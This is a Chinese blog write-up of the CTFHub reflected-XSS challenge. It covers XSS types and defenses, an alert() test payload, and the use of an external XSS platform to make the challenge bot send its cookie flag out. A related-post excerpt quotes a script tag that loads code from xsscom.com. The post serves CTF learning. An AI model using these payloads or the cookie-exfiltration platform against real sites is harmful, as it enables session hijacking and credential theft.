CTFHUB-技能树-Web题-XSS-反射型

已于 2024-05-09 21:13:21 修改
阅读量827 收藏 4
点赞数 10
分类专栏: CTFHUB解题思路 文章标签: 前端 xss 网络安全
于 2024-04-11 16:47:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Static______/article/details/137643767
版权

CTFHUB-技能树-Web题-XSS-反射型

文章目录

XSS

参考链接:https://blog.csdn.net/weixin_43486981/article/details/107974878

知识点:跨站脚本攻击XSS

XSS允许恶意web用户将代码植入到提供给其它用户使用的页面中。

特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话
类型:

  • DOM型:属于反射型的一种,利用非法输入来闭合对应的html标签。数据流向是URL→浏览器。
  • 存储型:危害大。相关源代码存放于服务器,用户浏览该页面时触发代码执行。
  • 反射型:需要攻击者提前构造一个恶意链接来诱使客户点击。

防御:

  • 输入验证。
  • 数据消毒,过滤有害输入,如<> ’ " # & JavaScript expression等。
  • 黑名单,过滤可能造成危害的符号及标签
  • 白名单:仅允许执行特定格式的语法。
反射型

在第一个输入框先随意输入,进行观察

输入admin后,会在页面显示,猜测可以通过该输入,改变页面内容。

在这里插入图片描述

尝试输入xss测试语句

输入<script>alert("1")</script>

在这里插入图片描述

出现弹窗,得到一个url

http://challenge-88d59799ffd8611c.sandbox.ctfhub.com:10800/?name=%3Cscript%3Ealert%28%221%22%29%3C%2Fscript%3E

第二个输入框提示输入url,那就复制刚才测验后生成得url
在这里插入图片描述

返回successfully得提示,猜测在后台进行访问。

如此想到要利用XSS platform平台

XSS platform平台

XSS platform平台,在上面注册一个账号。xsscom.com//index.php?do=login

创建一个项目:

在这里插入图片描述
在这里插入图片描述
根据提示,把XSS平台给出的代码复制到第一个输入框中进行注入

在这里插入图片描述
在这里插入图片描述
提交后,在第二个框中访问第一个框注入XSS脚本后的网址

在这里插入图片描述
提交后,在XSS平台查看注入结果
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

部署XSS-platform平台
python炒粉
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出人申请重新对过渡进行修改发布的权利,但对每个均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
Python-一个基于burp的反射xss检测插件
08-12
一个基于burp的反射xss检测插件
[ctfhub]-xss详解
weixin_52116519的博客
04-28 4810
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
ctfhubxss
小宇的web博客
05-22 1602
ctfhubxss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
xss跨站攻击脚本概述
xu_1234567的博客
10-28 307
1.XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 xss攻击分为三类: (1)持久跨站(存储xss ):最直接的危害类,跨站代码存储在服务器(数据库) (2)非持久跨站(反射xss):反射跨站脚本漏洞,最普
CTFHUB------XSS
qq_45616570的博客
06-23 708
title: CTFHUB------XSS date: 2021-06-23 10:48:44 top: categories: CTFHUB tags: 网络安全 CTFHUB CTFHUB------XSS 反射xss 目 解思路 目是xss反射 xss反射是将变量的值换成xss的payload flag在cookie中,利用xss平台进行获取flag 解过程 1.创建xss平台项目 2.点击下一步,勾选默认模块 3.点击下图中的一个作为反射的变量值 4.返回.
ctfhub-技能树-xss集全部习详解-最新
weixin_73562787的博客
08-10 2947
结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag。
利用Express模拟web安全之---xss的攻与防
01-26
跨站脚本攻击(Cross Site ...恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的, 还有另外一种产常见的就是CSRF(后面讲到)。
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
CTFHUB——反射XSS详解
wuuconix's blog
09-01 7443
背景 本来看ctfhub上有xss目,打算好好学习一波,结果点开一看,只有一道2333。 便现在dvwa上熟悉了一波。所谓反射是相对于存储来讲的。 如果黑客的xss注入是通过某种方式储存到了数据库中,那就是存储的,这种xss的特点就是每次访问该页面都会收到xss攻击,因为js语句已经放在数据库里了。 而反射xss则不是这样,每次触发只能手动输入和点击才能触发。 我认为xss产生的原因主要是对便签审查不严格造成的。 dvwa xss 下面写一下dvwa中的三种难度的反射xss。 <?
XSS20关练习源码
09-04
包含20关XSS练习的源码。文件都为PHP类,下载个phpstudy就可以搭建起来了。我已经通过了,所以共享出来给大家练习。
CTFHub | webXSS反射
2301_76435948的博客
09-27 365
XSS反射:URL地址当中的恶意参数直接被输出到页面中,导致攻击代码被触发。
CTFHub | 反射
尼泊罗河伯的博客
12-16 296
检查网页显示内容发现有一个输入框以及一个提交表单。可以在这个输入框中输入你的名字并提交。第二个输入框是发送构造好的 XSS 链接给机器人模拟执行。一般情况下,在一个网页中有一个输入框并且带有一个提交表单的,就有可能含有 XSS 漏洞。
CTFHub——XSS
最新发布
2302_79119987的博客
03-28 723
"fangfa('可控点')"> 使用 ” 闭合:与上思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
CTFHUB-WEB-XSS-反射
weixin_43486981的博客
08-13 3643
CTFHUB-WEB-XSS-反射知识点:跨站脚本攻击XSSXSS platform平台 知识点:跨站脚本攻击XSS XSS允许恶意web用户将代码植入到提供给其它用户使用的页面中。 特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话 类: DOM。属于反射的一种,利用非法输入来闭合对应的html标签。数据流向是URL→浏览器。 存储。危害大。相关源代码存放于服务器,用户浏览该页面时触发代码执行。 反射。需要攻击者提前构造一个恶意链接来诱使客户点击。 防
CTFHub-Web-反射XSS
qq_54037445的博客
11-28 448
CTFHub-Web-反射XSS XSS平台
CTFHub靶场————XSS
qq_61579604的博客
10-17 204
写入代码查看是否出现弹窗,查看源码发现存在xss但需要闭合后才可以出现弹窗。放入脚本,使用$.getScript功能是异步加载并执行。查看脚本注意闭合(利用xss平台的脚本代码)检查是否存在弹窗,可以放在url地址栏上执行。去平台查看cookie获取flag。检测是否出现弹窗利用双写绕过过滤。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。查看cookie获取flag。写入代码查看是否出现弹窗。插入脚本后将网址输入。
CTFHubxss——反射
用博客做做记录的小白
07-10 209
CTFHub靶场的xss反射练习
CTFhub XSS技能树
07-28
XSS(跨站脚本攻击)技能树是一个由CTFhub创建的学习路径,旨在帮助初学者逐步学习和掌握XSS攻击的技术。以下是XSS技能树的一般路径: 1. 基础知识: - 学习什么是XSS攻击以及它的原理和分类。 - 了解XSS攻击的危害和潜在风险。 - 掌握HTML、CSS和JavaScript的基础知识。 2. 反射XSS: - 学习如何利用用户输入来注入恶意脚本。 - 理解反射XSS攻击的工作原理。 - 掌握常见的反射XSS漏洞利用技巧。 3. 存储XSS: - 学习如何在目标网站上存储恶意脚本。 - 理解存储XSS攻击的工作原理。 - 掌握常见的存储XSS漏洞利用技巧。 4. DOM-based XSS: - 学习DOM(文档对象模)的基础知识。 - 理解DOM-based XSS攻击的工作原理。 - 掌握常见的DOM-based XSS漏洞利用技巧。 5. 防御措施: - 学习如何防御XSS攻击。 - 了解常见的防御机制,如输入验证、输出编码和内容安全策略(CSP)。 - 掌握安全编码实践,以防止XSS漏洞的出现。 CTFhub提供了一系列的学习资源、挑战和实践环境,帮助学习者在实践中掌握XSS攻击技术。通过完成这个技能树,你将能够更深入地理解和应用XSS攻击。请记住,始终遵守法律和道德规范,只在授权范围内进行安全测试和渗透测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值